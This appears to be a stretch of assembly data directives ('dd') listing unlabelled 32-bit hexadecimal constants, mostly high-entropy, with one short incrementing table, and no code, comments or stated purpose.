dd 24918DCDh, 0E1A92EF3h, 1A81B60Ch, 0E6E16664h, 0B0808B51h
dd 0A6D361A3h, 0A2E7A4EDh, 56165BFFh, 18981873h, 9AF9CCE3h
dd 8A9E048Eh, 4EA82062h, 29BEACC2h, 3318B120h, 482422C8h
dd 236F3BE9h, 3653F05h, 408C8E1Bh, 8BC6A9B9h, 747C89A5h
dd 233AEC15h, 0E255B4DAh, 0FA493CF3h, 0A8083ADDh, 31321256h
dd 9147BBBh, 0F09D758h, 0AB6C449Ah, 0B10AF7D4h, 1467C3B9h
dd 9CA00D2Dh, 58160C6Fh, 0C2840E77h, 3D4C0A36h, 3FADB29h
dd 68FE725h, 0EBE6885Eh, 400E6F1Eh, 50BA73CEh, 0A8CDD5EDh
dd 0DEE3CEFBh, 0D65E3D8Dh, 267C00F5h, 9AC085BCh, 0C6A4B49h
dd 918C784Ch, 5342EB80h, 5812245h, 28F2589Ch, 6F0C58CAh
dd 0B310C53Dh, 0E7C95EB3h, 3E090971h, 0A8EB5F46h, 17C6C347h
dd 8485A022h, 0AC0875Ah, 32828454h, 22038C8Ch, 2B10B612h
dd 8D8C3EB8h, 0D60C6CCBh, 580E779Ch, 9867A622h, 2D51D83Fh
dd 9524824h, 0D9FB082h, 78B8FB50h, 983C36C1h, 0C85AF016h
dd 2A352D10h, 0B541DDDBh, 11E997Ch, 0D3AEF7F1h, 6662DA83h
dd 0E2309425h, 76FB0105h, 0BF3D8B1Dh, 63AF74A3h, 0C5C1E324h
dd 35C6C6E3h, 0A4350289h, 0E5E34E3h, 0B2288ACEh, 0C94A556h
dd 2EDBB466h, 34519DFCh, 8928B998h, 0E322710Ch, 5D6DA8ABh
dd 82BC2F61h, 8E4684ADh, 4DF94126h, 0E026F11h, 4B5A468Eh
dd 514FFFDCh, 5935975Bh, 83ABA342h, 0A0DEB419h, 635D645Ch
dd 7B7A9CC0h, 77B864D8h, 696BBA5Dh, 0DF4026EAh, 80D72AECh
dd 380543B0h, 4FAD5A33h, 0A0FB5DEAh, 0AC9689B5h, 595D7F5Ch
dd 9AD82022h, 4C44747Fh, 9DC88F3Fh, 0A689809Ah, 24C0424h
dd 0CF17928Ah, 0DCADCB26h, 412D3D71h, 57FE1500h, 6BE85C01h
dd 8CC7FE5Ah, 4B60A811h, 12D19631h, 0C0D1335Eh, 1C42A8A0h
dd 13D85005h, 11382691h, 44588B6Dh, 9113889Dh, 7D11DA27h
dd 94BBB08Bh, 52122090h, 139088B4h, 11289491h, 445A8B4Dh
dd 6444889Eh, 0D744A889h, 27C1E622h, 226C4C42h, 88B16CCh
dd 0D69C113Ah, 0C34D2699h, 1E46C758h, 0C25D1FA2h, 11335A8h
dd 3CED9B7Ah, 0FA88D894h, 6EC2A80Ch, 1BB8D5E4h, 46E43549h
dd 91BC8D46h, 0E46E234Eh, 891B88D2h, 16466234h, 4292E08Dh
dd 3081E823h, 0A2A27DE5h, 0D647010Ah, 1E3ECCD5h, 33AD5D31h
dd 0C010AF27h, 71B88654h, 0A8DAFFCCh, 6241C07Bh, 0BA40378Ch
dd 5D815934h, 7D58D58Fh, 680D22F8h, 0EB04F665h, 607C43C1h
dd 7C0F95F0h, 0F2D627Fh, 4B42FA18h, 0ADA90210h, 0ECF89D05h
dd 43E8DAA1h, 7226D389h, 261507CCh, 94093464h, 0A5017F2h
dd 0D0FB2930h, 0A50E48C4h, 0A0F00087h, 8916DDF1h, 1CA08F45h
dd 10468A54h, 7240E30h, 2C6CE02Dh, 2CCDE194h, 0E02EEC99h
dd 36A834F7h, 4C16A7A4h, 115C101Eh, 0D8393AF3h, 19819243h
dd 45CE4662h, 84A85456h, 5AA72426h, 0E992AFA3h, 0DF2C42DAh
dd 89023439h, 6715094Bh, 732A580Eh, 0B1263B41h, 44117577h
dd 7C5D4C06h, 45F18413h, 0CE7F306h, 1CC7FA47h, 5B149812h
dd 4BE0416Dh, 318D3124h, 63ED42F2h, 719EDE15h, 41471F40h
dd 54239FD1h, 0F83B0660h, 0DCBB1033h, 779CE00Ch, 0AF35FEB1h
dd 9D86008Bh, 75D9E83Fh, 9AB229F4h, 0D3CE3225h, 901D58B7h
dd 0F2FBA193h, 54B40A0Fh, 2A15C3C5h, 0C4937B21h, 8A916F2Eh
dd 3B2E3188h, 73D490CBh, 6D12E721h, 275C2865h, 0DF24E8F9h
dd 6AFE309Eh, 4BA5792Ch, 2B738098h, 58248C2h, 0C8EC71F6h
dd 35334F27h, 932AD50h, 28E0B2A0h, 36E48601h, 0F58872Fh
dd 0A5974046h, 88D4D58Dh, 12A097B1h, 12EBA832h, 636554C6h
dd 7B836359h, 0E5C36E90h, 29686563h, 5618AC8Bh, 8E4EFA1Dh
dd 3E311522h, 0D21223DBh, 1F6395F5h, 0F645C636h, 25A71052h
dd 1B507ED9h, 2DA1177h, 164CBB3Ch, 49003631h, 1A581883h
dd 0D7A21E77h, 9E12C29Ah, 2DD938CCh, 9067FC74h, 0D4C0893Eh
dd 3F589744h, 71A293DAh, 95DF3B2Ch, 8B57E2D4h, 5A31D395h
dd 63380CA7h, 0DA49F010h, 0BCAB9C65h, 335D5424h, 8A2C6530h
dd 7CB47488h, 21C0214Ch, 0B55AE4h, 0F02ABD7Ah, 0AC200272h
dd 0F4D40042h, 0A77EB54Dh, 4E59A048h, 0BD4197BAh, 79E6F268h
dd 0EC8CD05Dh, 0C6B31DC5h, 8BD6A63Eh, 3BEB4F15h, 5CA7671Ch
dd 5C603756h, 24EBF30Bh, 0E39776B6h, 0E821E575h, 418C127Bh
dd 36EA3DFEh, 0FB8AE653h, 9537E3F5h, 178D96Ah, 63256FC5h
dd 58714F9Fh, 7314ABD7h, 11DCE626h, 0C71EBA8Bh, 0A59FB62Dh
dd 67DAE7CAh, 9F4DCF8Fh, 2553471Eh, 0C54EF71h, 0F3BE60BCh
dd 0EC631E47h, 506647C6h, 8BEEF32Dh, 970C3F72h, 197F63EBh
dd 63815AE9h, 0D6433D46h, 228DC8B9h, 38923CAFh, 0E0A22B91h
dd 48C585A1h, 0BA74AB12h, 17291F1Bh, 1AFA582Fh, 66615826h
dd 0F93F2E9Ch, 0A9FF8EE3h, 1EBD54C0h, 0ED3CADBDh, 269CB2C8h
dd 0E79646A2h, 51F507F3h, 904E4613h, 4D25A0A5h, 8A2858BCh
dd 0F72D4DD9h, 412DB905h, 0EA40E4B5h, 29B006B0h, 5FC6760h
dd 825AA895h, 3CA6C425h, 0BD034084h, 43C0C163h, 2C240197h
dd 945AC11Fh, 11B438BFh, 8A836FDFh, 0E41807CCh, 7CC8FCBCh
dd 0A820F767h, 0C8092CAEh, 8D607F44h, 4E7C17E9h, 22EB367Eh
dd 55966930h, 8405E15Eh, 699F3BCCh, 4DC44E69h, 0A2C12713h
dd 97DE602Fh, 0AA417588h
dd 8D094341h, 0AE61749Bh, 6101AA4Fh, 4E3F0FDFh, 57732D53h
dd 0C588032Bh, 80B9747Ch, 5056212Ch, 512930F2h, 30443241h
dd 73BE55C0h, 37EB9453h, 300345DBh, 0D97B99AFh, 5058106Ch
dd 4FDF11FBh, 9597DFE5h, 83439778h, 0C7057A77h, 4B54E188h
dd 22AB960Eh, 7FE0651Eh, 531AD763h, 0EA39A075h, 3630122Ah
dd 2102DCB2h, 2384225Ah, 8FB492C8h, 4C225159h, 0CC12702Ch
dd 0DB5DAC70h, 2A4A0B51h, 183B624Bh, 45CB2CBFh, 0C8E7E948h
dd 0B73B14B2h, 65970204h, 8DC4B711h, 45D99646h, 647A72C8h
dd 68CF0579h, 6DE38C1Bh, 8D781AF0h, 467E0E6h, 601880C9h
dd 0E2E0BD17h, 0C0C6168Ah, 0E2FCAD76h, 60505054h, 220C5845h
dd 2684FC3Fh, 0EBA2C684h, 20A46453h, 4518EE8Ah, 0D2487D95h
dd 0FB1BD9F6h, 7C7B203Eh, 9CDCAD17h, 92A6875Dh, 5B3E7C08h
dd 993A468h, 0A0AF7AB6h, 1DFFFDEEh, 234B8E9Eh, 56A19D51h
dd 0D582A063h, 0EE82AA23h, 2FC20CA3h, 0D758A649h, 85B82B54h
dd 2AED97h, 0D785A227h, 83596704h, 87E1C51Dh, 4B6A4DC4h
dd 5DC022E2h, 0C873A463h, 6A297114h, 0D388CBAh, 7A5055Ah
dd 810FA042h, 19671285h, 45641D28h, 3715223h, 8A406A7Fh
dd 42D35C4Ch, 0EF41462h, 0BA899C90h, 551819h, 6DE6E22h
dd 83DCD646h, 1340C240h, 61884A02h, 76FA9BE0h, 63A6F102h
dd 809D19F0h, 5E3ADE2Eh, 240CA500h, 0D206FC77h, 0C2330477h
dd 5B5406CFh, 79FC6021h, 454108A5h, 0E21151CBh, 62588C06h
dd 0A9BD52C6h, 0DB299DA3h, 0EB82CFADh, 50642A5Ah, 0C6589669h
dd 576F8982h, 71717939h, 6B3C6655h, 680146A0h, 21A98774h
dd 0A3DD717Ch, 0DAA0D424h, 2F105649h, 0F84FE541h, 627197CCh
dd 47284B9Dh, 0E16C9758h, 0CD628BB0h, 26A118FCh, 0DA25BCC0h
dd 0ABCC8DDEh, 8A13758Bh, 49EE8E2Fh, 0E72D6717h, 5903F5C7h
dd 3B981BD7h, 0E11315F0h, 46FE46E3h, 0DE62041h, 0FA58C383h
dd 0DF7F677Dh, 12BE25B9h, 0C0B9CD0Bh, 0BF2A31E8h, 0C104F72Ch
dd 8456C707h, 803431B8h, 725F15B3h, 0A4E05D64h, 681397F1h
dd 0B550905Bh, 72402D5Ah, 0A291945h, 7FF31912h, 3AE12B54h
dd 1265E302h, 5D8C2ACAh, 0B166F27Ch, 1101E2CCh, 0CF268570h
dd 0E55C35C6h, 4A4C1BEFh, 0FA40814h, 31301F02h, 8EC91525h
dd 691D6123h, 0FB29F4C8h, 0C6CA30C8h, 0C5E98D8Ch, 0B8231DF8h
dd 0D2382581h, 245064B0h, 38030CF0h, 95FD239h, 9548C86Ch
dd 0B687C4BDh, 0E5F5832Eh, 4B9BF0B9h, 90A69DA1h, 68FC00F4h
dd 0EEA3AF03h, 0DB8E0268h, 446849CDh, 0D26047E9h, 6966A900h
dd 0EE827945h, 8029BF03h, 0AB55AB28h, 3024EBBFh, 0C58E2C2Ch
dd 0DC18A196h, 4AA27EF5h, 0BE0F8155h, 12402ED2h, 3C818C4h
dd 6C57F255h, 0AB9B112Ch, 0DB02B8DAh, 96126CBBh, 76375594h
dd 7D5FF1FAh, 60389224h, 0B24F49E0h, 148A080Bh, 0BF0FECA3h
dd 0FB3B82F9h, 1CCCDB70h, 3125C3B7h, 5098E1E4h, 5966C886h
dd 0EC552037h, 19302E1Bh, 2033157Ah, 0B0180249h, 21A3700Dh
dd 986D8DAh, 0CF5C07A1h, 88DD6910h, 7C826833h, 0E915626Ch
dd 0F612B0C6h, 0D7E405F7h, 24064A4Dh, 2ABB7C1Ah, 0D8C2F8F4h
dd 89A04A19h, 0DD94F6D8h, 0AFF46955h, 8ACDF520h, 3014D02Eh
dd 478CFB51h, 7814106h, 8DF2AAEh, 882F9ED8h, 279D60DDh
dd 0A306C21Ch, 7FE2C86Fh, 35C6464Fh, 0AC5F413Bh, 0D4DF2EC2h
dd 0BD81CBFCh, 0A2FCEB8Dh, 76380463h, 0CE385970h, 438EC3BBh
dd 531AC4E9h, 0F8360064h, 518E5240h, 340DF018h, 0EBFBFAE0h
dd 0CECF440Eh, 2CD1B541h, 88E10C2Dh, 18798628h, 26BEC6D1h
dd 2E1F3122h, 1592E3EAh, 20156165h, 233A7086h, 83F22720h
dd 3261039Ah, 0B085FC2Bh, 4A44228Ch, 69705C2Ah, 14C51405h
dd 6C943E3Ah, 8D500D54h, 8FE7A900h, 0A3E409ABh, 0F8AEC057h
dd 0B500757Fh, 0BBE717Dh, 0A1CE0D2Ch, 20500421h, 0DC1A700Dh
dd 0E15FC6Ah, 2045380Fh, 0B748A6E2h, 6AF01258h, 693C512Ah
dd 0F51663C0h, 0F8725782h, 98A6D74Ah, 1502D808h, 3BCAA84Ah
dd 389A4A13h, 1237E741h, 7FBFB795h, 684068F4h, 0C725FE6Dh
dd 27FE591Fh, 245027B0h, 0C816F866h, 0B43DD2F0h, 6D0E6D28h
dd 2483584Bh, 23593EB1h, 952C8B64h, 15F75D5Ah, 3D1900A0h
dd 82305AD3h, 0CA2C1963h, 9F3AAD8h, 0D327FE9Eh, 3848AE2h
dd 874BF868h, 8718BBAh, 99679C36h, 4D81C0D1h, 1E244F5Fh
dd 45326CABh, 299A06B3h, 510516A8h, 292D62CDh, 0C75A75F2h
dd 0EA9B1646h, 0E47018E0h, 16DA4504h, 0EC28495Bh, 44711B2Ch
dd 0CC4DF9E4h, 0CB3C4C6Fh, 0E689DE72h, 0A3DD14A3h, 9D6F5486h
dd 899D4862h, 0E373E33h, 1ABE202h, 97906BE0h, 8A71EED1h
dd 0B178B6F7h, 0DBA842AFh, 694D55DBh, 6901B98Ch, 764A2393h
dd 5FE1C457h, 0C6008718h, 0A2584144h, 401BF97Ch, 31AC9AEEh
dd 431C3660h, 0EABD00CDh, 0A6445567h, 0DB2CA1D1h, 0D8866C68h
dd 0BF4A253Dh, 21D3225Ah, 20616CC7h, 37D0664Dh, 65407A52h
dd 0B898194Dh, 0C07D115Bh, 0FDAA43A1h, 0C7170144h, 91313386h
dd 26243D64h, 731DB4DCh, 0D557A672h, 0E20B9836h, 4C77740Ch
dd 0E1B865Ah, 0FCD50084h, 0D7782A8Fh, 873158A6h, 92212EF9h
dd 59CFE172h, 72C00C9Ah, 45E18505h, 675FC604h, 0A61CA147h
dd 92981F79h, 83890FD8h, 8D63DC75h, 0EF5F5E37h, 9DF01029h
dd 92D34A84h, 0C2F1EE91h, 1741D662h, 0CC6C3FFDh, 3B538B00h
dd 0D70D130Ah, 0DD3598C5h, 0B55FEB7Ah, 62FC1500h, 0CDABEB02h
dd 0E0F65115h, 0AC572BC8h, 2396E0ACh, 0BFAC5D06h, 0F2C958CFh
dd 0A0280B01h, 3561F256h, 0E2D891D0h, 7C182CFDh, 32C7EE30h
dd 0C29924E6h, 0F5D1B50Fh, 0B8D46AC0h, 0C18998DBh, 0AE345D9Bh
dd 839150C5h, 46F648D1h, 0B5E08F8Ah, 0AF668261h, 0A2A71168h
dd 48130A11h, 0CDF098AEh, 72CA2BD8h, 9408D19Ch, 0FB2E18Eh
dd 586212E7h, 0ED90EF07h, 5AFB0EACh, 0DAB1C78Bh, 8531E888h
dd 7E55FA75h, 3F126154h, 0B465967Eh, 0AE94E9DBh, 5E060EACh
dd 0A26181E7h, 4BA7C55Dh, 0C5155389h, 0E3AF0173h, 105349AAh
dd 76C904A9h, 60756A6Bh, 6AE257CDh, 1B01916Ah, 2171275Ah
dd 67C0973Ah, 0EE23FD2h, 1AC63585h, 96A5B50h, 481BEF79h
dd 0DE06DCC4h, 0D03291C1h, 1CCF2380h, 7812407Ah, 445ACC6Eh
dd 0C5EFB540h, 0EE65E33Eh, 0E14D7A0Eh, 0D4F538Ah, 4A83F470h
dd 8EE5A270h, 69340CC3h, 0BC62484Ch, 1841F224h, 0E9C8E2E1h
dd 18252D53h, 0A6FD1C72h, 5E0AB08h, 24D021C0h, 0C91854A8h
dd 2DF2A0E8h, 0DB165D48h, 0D1C291C9h, 8C786CBEh, 8B28313Fh
dd 5DA32D84h, 3B273CD0h, 0D15DB0CAh, 0A5FEFE8Fh, 2363509h
dd 3F052205h, 3677B466h, 68E1DE14h, 951572A1h, 661C87EAh
dd 8FAC5209h, 6E3A52D1h, 0F678AA86h, 826F4EC3h, 8A7DA55Dh
dd 0FE551A02h, 4A42150Fh, 0D6A84833h, 0B33EB1F2h, 33189FFh
dd 88EC6518h, 130A2A2Eh, 0F19F1D75h, 0D62A943Dh, 79D923BAh
dd 9248A689h, 0C888AE29h, 0F45BE545h, 0BB0A574Fh, 1651480Fh
dd 0C4ADE8B2h, 0AED82028h, 0B0455455h, 0A8AC5B9Fh, 0A340B08Ah
dd 560BCAA9h, 0C0EECCB0h, 3B0AB381h, 0C274B747h, 303C4CAAh
dd 9381B6D7h, 60583195h, 913DF7BAh, 293EC6BDh, 0A5B40831h
dd 0AAC293C7h, 0D0628820h, 2A343A84h, 5584FAA6h, 60FF7415h
dd 40BFB655h, 602FD7h, 541825ABh, 0A76AAD8Eh, 3CA38752h
dd 789C8A29h, 0D9A10E20h
dd 4ED476AEh, 0BB02EBAh, 19FCA152h, 0D64C66A5h, 3CEEE35h
dd 608919B2h, 0DB95EB72h, 69555A3Ah, 4A6A5539h, 0DE6A0969h
dd 9C7DF6D1h, 18D1D18Bh, 0BE57EA51h, 62ACD316h, 1844A8F3h
dd 0A18FEC1Bh, 39E95191h, 0CF558E82h, 0E6DF1645h, 0D145AA7Bh
dd 1D05674Bh, 869DCC65h, 32D5771Dh, 0B0D0277Fh, 68D8DFE3h
dd 84727637h, 825D8FC1h, 68287358h, 8681213Ch, 993BBF0Bh
dd 0D13A9DDCh, 1A690EF8h, 68A69E08h, 0EACADC75h, 0CCBB8454h
dd 5E57E3A9h, 76F6CC80h, 0B8BC7716h, 3A9139C9h, 0A3988930h
dd 10CA4508h, 6566D777h, 0BE40F78Fh, 6A203C12h, 638DE5B4h
dd 0F840B425h, 0F679404Ch, 0A7085F3Dh, 0E6CAAE51h, 76ACFD45h
dd 8F5364E4h, 9EC8F76h, 0A827B550h, 126620F3h, 2A261F7h
dd 0DEAD5918h, 0D65DB8FBh, 0C74DA2E7h, 64CFF41Ah, 0DB619968h
dd 2DB5ED0Fh, 68D6268Eh, 6DFA42AFh, 0BCF00F09h, 0F4ECB8DEh
dd 0D80B35A2h, 9B3B1B74h, 419BE731h, 51BDC903h, 99B5245Dh
dd 41D31600h, 0F5563EAAh, 73C94A81h, 0F494B973h, 915D7FB5h
dd 52D120BEh, 0B3126630h, 0C46150FBh, 18B22B68h, 5E30E84Dh
dd 0DA4AA96Bh, 0DDCB10D3h, 8B026AE7h, 71578526h, 0ABAA5574h
dd 821A9884h, 56D5B115h, 68A2D3AAh, 0CAE95A26h, 5574CF3h
dd 0C0B752D9h, 75490276h, 0F740A112h, 9D720072h, 2B63B9B1h
dd 8C05ED50h, 0C8480E3Ch, 13123206h, 903582AEh, 0E54AA40Ah
dd 7AC1485Dh, 88691101h, 7BD0359h, 90244211h, 0E0381955h
dd 0C7260408h, 0BA8DD911h, 202C2EDAh, 47172245h, 0DA4F2CCh
dd 9F4B7D33h, 0FB7FAD29h, 0F8A73E8h, 175FE16h, 0F934AB80h
dd 33A681CCh, 0A546157Fh, 5942E08Eh, 0AEE0817Fh, 46410536h
dd 89656E99h, 5247278h, 12CA4990h, 378B0B2Dh, 0AB7BE360h
dd 27135502h, 0A957F6C5h, 0C974F298h, 20DC3329h, 0D8E8A038h
dd 5D25AA73h, 80A2C57Ah, 551E568Eh, 942B89B5h, 0CCD76AFAh
dd 11B5839h, 0D0F6DA2Fh, 42D5EB64h, 0FC6200F5h, 0FBD00564h
dd 0F1D71C8Fh, 0D10474B4h, 8CC13A62h, 2D12FC03h, 0A35F9B35h
dd 59470FC2h, 0B90DC2C9h, 15D0A29Eh, 0C608A270h, 0F9B5314h
dd 1F57C963h, 0E9682A38h, 8EE220E8h, 0E55C9A06h, 5A6318EEh
dd 95B0CEFAh, 8A304902h, 69EABA67h, 7021A3Fh, 0FB3F2AD3h
dd 3426D296h, 3D0042Fh, 9D0B31BFh, 9C5730EFh, 80D876F5h
dd 0E2FD9305h, 0B1834C95h, 82176B44h, 7285301Bh, 89BDFCC1h
dd 0D508D31Fh, 0F72D816Ah, 0D01C3745h, 0EC502A1Eh, 6BC4F5A5h
dd 509A9753h, 0BE946262h, 548668ABh, 75097A31h, 84A5A71Fh
dd 1270EC50h, 0ACFFC898h, 5D82880Ah, 5643ED50h, 35518453h
dd 513BC78h, 533370BFh, 0BD97F0A9h, 0D9501202h, 6E55CD5Dh
dd 5FED4EA9h, 4755ED40h, 5C6EE2A1h, 26D259E7h, 0D392DE96h
dd 0EF358495h, 0D7ABAAEEh, 5182E9CEh, 21E99D99h, 91063970h
dd 25B7239Ch, 588A7558h, 0BC3ED785h, 589A378Ah, 0D744BA8h
dd 0A1CA4DFCh, 50F4F051h, 0A73F5B06h, 0B044C9A1h, 98198DA3h
dd 34EE246h, 472D722Bh, 69CA8E1Ah, 899A57F0h, 0C964C093h
dd 0F85160CDh, 0D1E4195Ah, 39C95CF9h, 628CEC81h, 0A0CCE39Ch
dd 4D051425h, 196209CEh, 0F3CBF9CEh, 0A4104AD7h, 0AB45B41Eh
dd 0D2DF030h, 0B5778A47h, 2E689423h, 7A1EA2AFh, 6D15AA34h
dd 5C885746h, 984393BCh, 350DB8F5h, 411EA290h, 81D4F690h
dd 0D151E4D9h, 5046A4D4h, 8ED34C70h, 8C0FCEF2h, 48B24620h
dd 44C60554h, 1A723103h, 0FE122AD4h, 0BD8DA9CAh, 1792412Fh
dd 927C8925h, 0AB461798h, 21075F2h, 0FF4125B7h, 49D893CDh
dd 0C9D15143h, 1706D574h, 0C781B1FDh, 2CC6BA57h, 5105F054h
dd 0E5365932h, 0C8C722EEh, 0DC6EA4CCh, 0D6224158h, 0CB036235h
dd 0C199E23Ah, 0BBACE947h, 282A81DCh, 0CC6F47A1h, 4B3B8BEBh
dd 46605F1Ch, 9201984h, 0AD0B6F1Fh, 47AD132Bh, 816AA964h
dd 25345386h, 5F20E227h, 84583B01h, 0A4E722Bh, 61451EA7h
dd 2226095Ch, 5F9C6B46h, 700B4558h, 0FA0CD156h, 0F2C2AA0Eh
dd 0F50B569Ch, 26F2962Dh, 813B0944h, 0E2C88D98h, 0B84FB92Ah
dd 0CE693A2Ch, 25D29CAAh, 0CADD8128h, 36713EC1h, 0CC449D32h
dd 0E0901C07h, 0A4BF7640h, 0A047CC12h, 0E3B0168Dh, 0E831AFh
dd 0D15C8A97h, 0A6E90125h, 260BD510h, 0EEF6EC8Fh, 0F00170Ch
dd 2A5AEC28h, 6E7770FDh, 174D37E7h, 0A33B7B73h, 0B3136108h
dd 8C0B959h, 9069B157h, 0AE9A1AAEh, 73B4C822h, 0D572C31Ch
dd 65510A43h, 6F69B2C7h, 0EFA6BA6Ah, 1CAD6A81h, 0E19615E0h
dd 3143C3CFh, 417C1C25h, 0EB712C45h, 0C3225732h, 2B198378h
dd 4BD5C68h, 0BAF2901h, 2566B7C1h, 7ABBD57Ch, 4D305C6h
dd 0BAEE027Eh, 0F0444D4Bh, 1347D7Ah, 8B8CA02Dh, 0C011D20Eh
dd 99FF4E87h, 0CE656758h, 65F6D7DBh, 62A8F6ECh, 0F5D0F35Fh
dd 0BDD7EDD3h, 0CBAA57DBh, 0FB73A0E8h, 0D30052F2h, 61A16A56h
dd 0F8521D77h, 0D0F5A5AFh, 0A1F2228Ah, 677E8C7Ch, 708C821h
dd 413B8986h, 21D78832h, 6BA33C9h, 0DE405D2Ch, 0B3C074C2h
dd 0C5DF87C3h, 2B6C26C5h, 1A62666Ah, 0A8117FC5h, 0F7A6F10Ch
dd 0E5C413CEh, 698B3D79h, 0C0FCFB22h, 8A458614h, 33A055FBh
dd 5431F530h, 0EB96458Ch, 3030D223h, 3B48303Dh, 6FBF7613h
dd 0AEBB1602h, 0D2300816h, 92C987B4h, 7A59024Eh, 33604DECh
dd 1DA16C28h, 52B57984h, 0DE36430Ch, 15A18FACh, 0DBB4E3F1h
dd 0F6221106h, 0CA2AF516h, 4A849988h, 0A6FC7911h, 0ECC67914h
dd 0C047157Eh, 0C3A80FBCh, 114D9387h, 39FB9E6Ah, 5E628479h
dd 91E8045h, 0AC120E1Bh, 116D5023h, 4C61FF5Bh, 6C10AEB1h
dd 0C56A9828h, 82EB231Bh, 84070065h, 14CC07C0h, 4FE267E1h
dd 0B8AD239Ch, 83867831h, 0A8A7E7F1h, 65670D43h, 0C6EB1114h
dd 54C873C0h, 0E4429A84h, 3B8C30A5h, 71113EC4h, 0A431612Ah
dd 3077B809h, 0DB181EA0h, 7F68944Fh, 60D74B87h, 0EB68E970h
dd 85EB2808h, 92ED1145h, 2362183h, 32821414h, 0A0B78EFFh
dd 72DC4746h, 0A3CB3BA9h, 808D301Dh, 0A5BC01D3h, 0D68928E6h
dd 99BE472Ah, 592FE2C7h, 8F05E402h, 22C6960Bh, 71A02EEh
dd 0E470995Eh, 8C0E4221h, 0B25D0BB9h, 0BA85D8Fh, 70F4470h
dd 311C10C6h, 43030227h, 7C4602EAh, 0E82397A3h, 50607BD1h
dd 717805Dh, 2EB72E0h, 9561611Ch, 8E014303h, 81CA13C0h
dd 0DC4776D1h, 78C0B889h, 44F200BBh, 5D7CE538h, 38502380h
dd 48886B0h, 0C48D113Dh, 9053CFCEh, 2CE7BD1Ah, 85537840h
dd 368D039Eh, 98B69568h, 0FFF053A6h, 7752C9F5h, 31F48E01h
dd 0F0601CC2h, 0BBB8F725h, 47DE7300h, 1C02C0E4h, 39A997D1h
dd 2312EF20h, 0CC500C34h, 0E0744409h, 857208Ch, 5B17EE1Ah
dd 0B40E48ADh, 228431A8h, 0F9D7D3B5h, 7BFEACE2h, 9E055F6Dh
dd 3889759Dh, 0BE7CC0BCh, 0C69159E1h, 66F10C24h, 88F14E02h
dd 0E2631537h, 0D589D470h, 0D3622395h, 8132A249h, 1160C8DCh
dd 5C40824Ah, 57Fh, 0C0008910h, 0D0000001h, 434A0041h
dd 6000h, 0
dd 20D9A594h, 523F0A48h, 87B3508h, 4FAC6847h, 0AD144235h
dd 7CCA1D1Ch, 0F2166FFAh, 1B386A11h, 1C883075h, 0AC685E7Bh
dd 0E8587300h, 619B9CA1h, 7FB4A1ACh, 0CB8085FAh, 2008108Ch
dd 0C215EC70h, 10003776h, 0D404123Eh, 4D0C8DBAh, 400A1BFCh
dd 0D2137D98h, 184CBA88h, 5DA8C021h, 5FE8A1F4h, 171BF509h
dd 0C3DF50Fh, 77301C36h, 59342CF7h, 1436F580h, 0B0E0D440h
dd 432B9342h, 0D94B42DDh, 642CDE7h, 809F761h, 0B2C5D08h
dd 2EC00434h, 94B43BFCh, 743598F4h, 2B918425h, 13043418h
dd 80A0C1DEh, 804386D2h, 973AD485h, 0DC881864h, 2CA021BAh
dd 619C670h, 10337A84h, 2B059090h, 3605E4F7h, 0A043F32h
dd 21C0D2Ah, 178E5820h, 5CFE8874h, 6540413Dh, 0B58085A7h
dd 0CA0610CCh, 1A120E92h, 167A9008h, 6CAB2874h, 2EC879A1h
dd 21E189D2h, 8086A540h, 0CAAD6F43h, 0E70F4305h, 0D40B0335h
dd 20834Bh, 8103571Dh, 10A15C8h, 0C20B2A0h, 10977981h
dd 808D8810h, 307D6010h, 0ACFB40C2h, 77FC010Ah, 2B6A5C3Ah
dd 7020695Bh, 429134E5h, 15D18284h, 8294873Fh, 0E685CEC2h
dd 0A0855616h, 1690A93Ah, 0A010BD4Ah, 0C1820F24h, 5022E782h
dd 86132A04h, 5F360A1h, 0A3A52921h, 7B90D80Bh, 0DB77284h
dd 72920214h, 0CE021959h, 1A8E1922h, 1B00480h, 808C0928h
dd 1A5044A0h, 0A45805C8h, 5360526Ch, 0F21C0C10h, 85604C6h
dd 13CE423Eh, 0D997A64Dh, 0FFF35374h, 846BE54h, 40A38F80h
dd 8C81290Bh, 1C506011h, 83A5084Ah, 12942928h, 5A50C4A1h
dd 0A9439287h, 0A5104A22h, 9449289Ah, 5144A2A9h, 45928BA5h
dd 184A3294h, 6928DA51h, 0C4A3A947h, 9A91E95Fh, 2E824690h
dd 23654B0h, 296752DCh, 0A5D54BE2h, 94379884h, 0A52A2A56h
dd 14AFA962h, 0D2D3A5C3h, 49805305h, 31A011D9h, 0D4404275h
dd 8443BFACh, 43D5FB42h, 73B52AC4h, 0DFA8B85h, 87AF08C2h
dd 195A61CEh, 0B1586C92h, 296C256h, 0FB196BA5h, 0A4B5B908h
dd 0E4468446h, 8710080Dh, 64C0043Ah, 640C38Ah, 96DC0470h
dd 63EC4Eh, 270F4249h, 2A4CB9DDh, 2E569B75h, 9E405EDEh
dd 48A88A01h, 211034BBh, 9E16150h, 618AE16Fh, 346059F2h
dd 1A3B998h, 32C155B7h, 5AC9DBEEh, 0E524165Bh, 0C58CA5C1h
dd 9DC23A40h, 81E3CCDAh, 614F84FDh, 82126704h, 60A18211h
dd 8074FFC1h, 0C8A3A602h, 0C773B6F8h, 202C23CBh, 1424820Bh
dd 938C9000h, 1845BD87h, 3600460h, 60A0E121h, 61A1E222h
dd 62A2E323h, 63A3E424h, 64A4E525h, 65A5E626h, 66A6E727h
dd 67A7E828h, 68A8E929h, 69A9EA2Ah, 6AAAEB2Bh, 6BABEC2Ch
dd 6CACED2Dh, 6DADEE2Eh, 6EAEEF2Fh, 6FAFF030h, 70B0F131h
dd 71B1F232h, 72B2F333h, 73B3F434h, 74B4F535h, 75B5F636h
dd 76B6F737h, 77B7F838h, 78B8F939h, 79B9FA3Ah, 7ABAFB3Bh
dd 5BD8F0F1h, 0F25068F5h, 0F6F7F8F9h, 0FAFBFCFDh, 0FEFF237Ah
dd 0D1762F77h, 1F784A68h, 1550C4F4h, 2FE40839h, 78BA59C5h
dd 332CECABh, 0B10B1222h, 918E5620h, 731BB3CCh, 0A1936480h
dd 8B4CBFA6h, 0B28E07A8h, 19E3A3D8h, 2A69A079h, 54115178h
dd 0F5227802h, 6A48821Fh, 71F06C38h, 0B7421471h, 16905068h
dd 2027046h, 21314012h, 1512D6C0h, 8E8053D0h, 5C19D850h
dd 60236F60h, 4B5CD28Ch, 0B50123A8h, 85B83A09h, 8028127Ch
dd 78130058h, 808970C0h, 2C492280h, 1207CB20h, 1DFE58BFh
dd 0A7B9A05h, 0DA0CE5F3h, 24081DA5h, 4C824358h, 15DC83D0h
dd 44DA9325h, 0E8916AEAh, 6356DC30h, 45636D99h, 8A0A79D9h
